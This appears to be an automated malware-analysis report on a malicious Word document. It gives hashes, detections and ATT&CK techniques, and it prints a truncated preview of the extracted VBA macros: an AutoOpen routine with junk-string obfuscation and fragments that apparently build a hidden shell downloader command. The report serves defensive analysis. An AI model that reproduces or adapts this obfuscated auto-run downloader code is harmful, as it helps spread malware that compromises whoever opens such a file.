Office (OLE) malware analysis — malicious · d24b8c467edd623f

MALICIOUS

Office (OLE)

119.4 KB Created: 2018-09-26 11:08:00 Authoring application: Microsoft Office Word First seen: 2019-05-16

MD5: 6ec5e70ac1c7292ca46a18991bdff1bc SHA-1: db8163e60e1931dee91628d1d48eaade1c067338 SHA-256: d24b8c467edd623fc8ef8196b51ae0a84cee4ecd312eea01ff29d84077a7fbf3

202 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample contains a critical OLE_VBA_SHELL heuristic firing, indicating the presence of a Shell() call within its VBA macros. The AutoOpen macro is present and likely triggers this malicious functionality upon opening. This suggests the document is designed to download and execute a second-stage payload, a common tactic for malware distribution.

Heuristics 6

ClamAV: Doc.Malware.00536d-6698469-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.00536d-6698469-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 82006 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	82006 bytes
SHA-256: `e0c7dee2dfa3aa47622524d0f7c976b3b256cc5807a584fafabaf2c00a77ed57`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "vamcilNuwC" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoOpen() Dim GAljk(2) GAljk(0) = Right(ZTDiElzE + uMEvrvRIHDuaBoEAzZj + EndJp, 802) + Left(lUKSAJ + lSbfkzGICzvELOsqDSqb + hJAmHBi, 789) GAljk(1) = Mid(HHTbZo + nsiSMzDHTLnICDVwTAA + JKoDv, 341, 325) + MidB(qnauOwcn + LdITQzQXpDAnZCjvIp + sEDiHoZW, 618, 927) Dim qjDjRC(1) qjDjRC(0) = Right(zDHjGSj + vWlzunhjoYaBDDMjimTQb + zLaMpiX, 484) + Left(NzwwWokN + zzDWVzuzcFLpVQU + CcOGznSn, 225) Dim CcllwH(1) CcllwH(0) = MidB(midbLrCu + BYQPEUkzWiizuCh + rNLdMO, 486, 18) + Mid(wshjKa + YiQNKiIBucRoVcnMmDqh + hZpDfYZ, 536, 291) + Mid(IdCdVKwi + abQVRWNjhwwjcImWDpZLoD + iQstDvw, 139, 961) + Mid(OBLwfbr + aUDNKHUvPcSfmrosAkV + OXVstukw, 823, 776) zFXmBLNzBwJ (KeyString(BqYEiuM + pABSFttr + 2 + 21 + 44 + IjPPM + iiTXD) + zHMKqd + XBODjpjj + KeyString(ABzwlbLn + iFSmT + 2 + 24 + 51 + zjiASJ + NAJkT) + cufAABVI + hwoQqzBBU + nRofiCztF + HLHQHztCl + wINiut + IkKuW + NGddN + fjwbAF + QjOjhonw) Dim FKJwm(1) FKJwm(0) = Right(CGffbqc + LEwZjczwnGMwwfaF + jzKzz, 982) + Left(otmOfc + ldpiLwiPpAvPWOzfH + mQZhJuU, 953) + Left(NwtzPVs + jjHwTjsdAiwbQLIiqEKS + VkCSHs, 91) + Left(FriRF + REzwhliFpMOptwcwwqK + dzSKU, 259) End Sub Attribute VB_Name = "jamGVKo" Function cufAABVI() whKsd = "d \ \//\\\ " + "/V/C" + """" + "set -;],=a207" + " 7a02 2a70 a702 02a7" Dim PCrOs(2) PCrOs(0) = MidB(MlwPwF + YJORjjbIwafKFtdcA + kEwwHRv, 535, 832) + MidB(PahunjhI + PRKmvarUdJrvZnZpfjH + MqdKGuu, 850, 924) PCrOs(1) = Mid(moJLqE + tpXiHkwISvDIaFzhPai + CFXddOwa, 497, 710) + MidB(oLVZlwmZ + LYKjGtXrKYbcCMrSVdXDml + HdcwrvN, 883, 979) + Right(IFDipzSM + NtfsGfnVXwNNTNjjP + YZlOSv, 664) + MidB(YJHukz + QBGdvvvmVVlmjUVFGrMQFR + DLVdWJ, 916, 305) Dim VYtYlJ(1) VYtYlJ(0) = Left(ukztTd + nSBlzKYtOijvwKYYLoRm + ZSdQCQj, 32) + MidB(oCQLn + OPjdbwZauEvIWjrsucXww + tVGBNkE, 192, 45) + MidB(wwWDZbV + AiIKFvLBrRivolYhUq + JOOYVr, 61, 909) + Left(bmKNvw + sIKFvAJToDnHPBOwPZUwwoLT + rpcIfwqJ, 87) jisifBfd = " 7a02 7a20 a207 7a20" + " 2a70 2a70 27a0 720a" + " 2a70 0a27 0a72 72a" XAZaqVzjsd = "0 20a7}20a7}" + "a720{7a02h" + "0a72c027at720aa702" + "ac0a72}207a;70" JMKKk = "2ak702aaa702e" + "a027r702aba072;2" + "7a0t20a7t7a0" + "2p02a7$2a07 a2" + "70m0a27ea7" cufAABVI = whKsd + jisifBfd + XAZaqVzjsd + JMKKk Dim ZlECj(1) ZlECj(0) = Right(BSivMtdI + zamVwljSGLuNolURTad + XzndAfBO, 289) + MidB(SiCbztWO + GkjiYHJmuVwzwwzmEwfrBu + tRaEOzJ, 317, 290) Dim FbvRs(2) FbvRs(0) = Left(vWPBiim + TFZvCbQdMTnrqIpCwYw + RRjJipj, 814) + Mid(YijSK + fofmsjcdVpJUordk + hnfdj, 651, 342) + Left(piYosKlv + ChFUrGzEuroZmDAJIWO + fKLZRJCv, 102) + Right(ZbTnWtiN + BFlkuKlmqnIRohiurwjB + WhMmOoB, 274) FbvRs(1) = Right(EapWzRJ + CRKiGbdTSARDXdZzA + uZKcUaL, 907) + Right(tUuMMCFK + iwqMBkizsJofQWiHDpXr + jutLaT, 790) + Left(Dwjwbj + ZidFpqbibDhwcoSpo + YUYQMYBW, 49) + MidB(dwIjS + DksrlhttGJJtdJJjYS + MZfWVL, 915, 865) Dim diqcfZ(1) diqcfZ(0) = Mid(hspvuP + tDkAMrVrRswbqQFrbQPhq + VhNQaOfM, 48, 235) + MidB(XlIwB + OqrbjlfPjdVuIoiKqdT + EcIrGTRO, 380, 169) + Right(iFdiv + fYqjsKTUqXDuXHcnQ + PCliEq, 680) + Left(umDjPOt + pzzXwEibhWBIaUozNGZ + KcQrro, 181) End Function Function hwoQqzBBU() hSWCXHTXia = "20t270aI70a2-72" + "a0e2a07k2a70o20a7va" + "027n207aI720a;a207)" + "72a0t7a20ta" spUSrU = "702p027a$7a20 0" + "2a7,27a0ja270w072aLa" + "027$7a02(20a7e" + "2a70la072i70a2" + "F2a70d7a20a" ojkic = "70a2o2a07l0a7" + "2n0a72w7a20o02a7D0" + "72a.2a07v70a2Y20a" + "7q07a2$0a72{2a70" + "ya207r27a0t2a70{27a" + "0)a720Qa720n2a07C7" Dim YsXcwa(2) YsXcwa(0) = MidB(EcCMqbY + tinSZQYqGznilEOLZDua + iQPONn, 520, 519) + MidB(cHJwcw + TUzWsamMMJDNwvzJwc + MsONdu, 310, 680) + Right(nHFWIXE + aORRVYtDdpSdkdizwrwc + MwIcmbF, 196) + MidB(JvaspjkM + UJGJlitriilicliQB + bHmpD, 743, 168) YsXcwa(1) = Mid(jWzPC + qIiwSUOXtiMwCBMizW + GziauPl, 327, 144) + Right(rHTlpHt + JEvOFnSDUqcuhbBTIaca ... (truncated)

SHA-256: e0c7dee2dfa3aa47622524d0f7c976b3b256cc5807a584fafabaf2c00a77ed57

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "vamcilNuwC"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
   Dim GAljk(2)
GAljk(0) = Right(ZTDiElzE + uMEvrvRIHDuaBoEAzZj + EndJp, 802) + Left(lUKSAJ + lSbfkzGICzvELOsqDSqb + hJAmHBi, 789)
GAljk(1) = Mid(HHTbZo + nsiSMzDHTLnICDVwTAA + JKoDv, 341, 325) + MidB(qnauOwcn + LdITQzQXpDAnZCjvIp + sEDiHoZW, 618, 927)
   Dim qjDjRC(1)
qjDjRC(0) = Right(zDHjGSj + vWlzunhjoYaBDDMjimTQb + zLaMpiX, 484) + Left(NzwwWokN + zzDWVzuzcFLpVQU + CcOGznSn, 225)
   Dim CcllwH(1)
CcllwH(0) = MidB(midbLrCu + BYQPEUkzWiizuCh + rNLdMO, 486, 18) + Mid(wshjKa + YiQNKiIBucRoVcnMmDqh + hZpDfYZ, 536, 291) + Mid(IdCdVKwi + abQVRWNjhwwjcImWDpZLoD + iQstDvw, 139, 961) + Mid(OBLwfbr + aUDNKHUvPcSfmrosAkV + OXVstukw, 823, 776)
zFXmBLNzBwJ (KeyString(BqYEiuM + pABSFttr + 2 + 21 + 44 + IjPPM + iiTXD) + zHMKqd + XBODjpjj + KeyString(ABzwlbLn + iFSmT + 2 + 24 + 51 + zjiASJ + NAJkT) + cufAABVI + hwoQqzBBU + nRofiCztF + HLHQHztCl + wINiut + IkKuW + NGddN + fjwbAF + QjOjhonw)
   Dim FKJwm(1)
FKJwm(0) = Right(CGffbqc + LEwZjczwnGMwwfaF + jzKzz, 982) + Left(otmOfc + ldpiLwiPpAvPWOzfH + mQZhJuU, 953) + Left(NwtzPVs + jjHwTjsdAiwbQLIiqEKS + VkCSHs, 91) + Left(FriRF + REzwhliFpMOptwcwwqK + dzSKU, 259)
End Sub


Attribute VB_Name = "jamGVKo"
Function cufAABVI()
whKsd = "d \  \//\\\ " + "/V/C" + """" + "set -;],=a207" + " 7a02 2a70 a702 02a7"
Dim PCrOs(2)
PCrOs(0) = MidB(MlwPwF + YJORjjbIwafKFtdcA + kEwwHRv, 535, 832) + MidB(PahunjhI + PRKmvarUdJrvZnZpfjH + MqdKGuu, 850, 924)
PCrOs(1) = Mid(moJLqE + tpXiHkwISvDIaFzhPai + CFXddOwa, 497, 710) + MidB(oLVZlwmZ + LYKjGtXrKYbcCMrSVdXDml + HdcwrvN, 883, 979) + Right(IFDipzSM + NtfsGfnVXwNNTNjjP + YZlOSv, 664) + MidB(YJHukz + QBGdvvvmVVlmjUVFGrMQFR + DLVdWJ, 916, 305)
   Dim VYtYlJ(1)
VYtYlJ(0) = Left(ukztTd + nSBlzKYtOijvwKYYLoRm + ZSdQCQj, 32) + MidB(oCQLn + OPjdbwZauEvIWjrsucXww + tVGBNkE, 192, 45) + MidB(wwWDZbV + AiIKFvLBrRivolYhUq + JOOYVr, 61, 909) + Left(bmKNvw + sIKFvAJToDnHPBOwPZUwwoLT + rpcIfwqJ, 87)
jisifBfd = " 7a02 7a20 a207 7a20" + " 2a70 2a70 27a0 720a" + " 2a70 0a27 0a72 72a"
XAZaqVzjsd = "0 20a7}20a7}" + "a720{7a02h" + "0a72c027at720aa702" + "ac0a72}207a;70"
JMKKk = "2ak702aaa702e" + "a027r702aba072;2" + "7a0t20a7t7a0" + "2p02a7$2a07 a2" + "70m0a27ea7"
cufAABVI = whKsd + jisifBfd + XAZaqVzjsd + JMKKk
   Dim ZlECj(1)
ZlECj(0) = Right(BSivMtdI + zamVwljSGLuNolURTad + XzndAfBO, 289) + MidB(SiCbztWO + GkjiYHJmuVwzwwzmEwfrBu + tRaEOzJ, 317, 290)
   Dim FbvRs(2)
FbvRs(0) = Left(vWPBiim + TFZvCbQdMTnrqIpCwYw + RRjJipj, 814) + Mid(YijSK + fofmsjcdVpJUordk + hnfdj, 651, 342) + Left(piYosKlv + ChFUrGzEuroZmDAJIWO + fKLZRJCv, 102) + Right(ZbTnWtiN + BFlkuKlmqnIRohiurwjB + WhMmOoB, 274)
FbvRs(1) = Right(EapWzRJ + CRKiGbdTSARDXdZzA + uZKcUaL, 907) + Right(tUuMMCFK + iwqMBkizsJofQWiHDpXr + jutLaT, 790) + Left(Dwjwbj + ZidFpqbibDhwcoSpo + YUYQMYBW, 49) + MidB(dwIjS + DksrlhttGJJtdJJjYS + MZfWVL, 915, 865)
   Dim diqcfZ(1)
diqcfZ(0) = Mid(hspvuP + tDkAMrVrRswbqQFrbQPhq + VhNQaOfM, 48, 235) + MidB(XlIwB + OqrbjlfPjdVuIoiKqdT + EcIrGTRO, 380, 169) + Right(iFdiv + fYqjsKTUqXDuXHcnQ + PCliEq, 680) + Left(umDjPOt + pzzXwEibhWBIaUozNGZ + KcQrro, 181)
End Function
Function hwoQqzBBU()
hSWCXHTXia = "20t270aI70a2-72" + "a0e2a07k2a70o20a7va" + "027n207aI720a;a207)" + "72a0t7a20ta"
spUSrU = "702p027a$7a20 0" + "2a7,27a0ja270w072aLa" + "027$7a02(20a7e" + "2a70la072i70a2" + "F2a70d7a20a"
ojkic = "70a2o2a07l0a7" + "2n0a72w7a20o02a7D0" + "72a.2a07v70a2Y20a" + "7q07a2$0a72{2a70" + "ya207r27a0t2a70{27a" + "0)a720Qa720n2a07C7"
Dim YsXcwa(2)
YsXcwa(0) = MidB(EcCMqbY + tinSZQYqGznilEOLZDua + iQPONn, 520, 519) + MidB(cHJwcw + TUzWsamMMJDNwvzJwc + MsONdu, 310, 680) + Right(nHFWIXE + aORRVYtDdpSdkdizwrwc + MwIcmbF, 196) + MidB(JvaspjkM + UJGJlitriilicliQB + bHmpD, 743, 168)
YsXcwa(1) = Mid(jWzPC + qIiwSUOXtiMwCBMizW + GziauPl, 327, 144) + Right(rHTlpHt + JEvOFnSDUqcuhbBTIaca
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.